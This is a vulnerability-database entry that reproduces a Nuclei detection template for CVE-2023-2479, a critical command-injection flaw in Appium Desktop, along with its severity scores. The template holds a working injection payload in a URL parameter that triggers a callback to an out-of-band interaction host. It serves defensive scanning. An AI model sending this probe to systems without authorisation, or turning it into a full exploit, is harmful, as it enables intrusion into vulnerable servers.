Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2479
HistorySep 15, 2023 - 7:11 a.m.

Appium Desktop Server - Remote Code Execution

2023-09-1507:11:13
ProjectDiscovery
github.com
8
cve2023
huntr
appium
oast
rce

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.964 High

EPSS

Percentile

99.6%

OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
id: CVE-2023-2479

info:
  name: Appium Desktop Server - Remote Code Execution
  author: zn9988
  severity: critical
  description: |
    OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
  remediation: Fixed in v1.22.3-4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
    - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
    - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe
    - https://github.com/Marco-zcl/POC
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2479
    cwe-id: CWE-78
    epss-score: 0.96532
    epss-percentile: 0.99605
    cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: appium
    product: appium-desktop
  tags: cve2023,cve,huntr,appium,oast,rce

http:
  - method: GET
    path:
      - '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: status
        status:
          - 404
# digest: 4b0a00483046022100c1a352672a989af8e3c79dfa0ed6be743b40148495bfe0de7495e721c3d3cf30022100dbadd06ff944bb8596396571fff0382198c298180fd68270d546b2d3f2500ef7:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.964 High

EPSS

Percentile

99.6%

Related for NUCLEI:CVE-2023-2479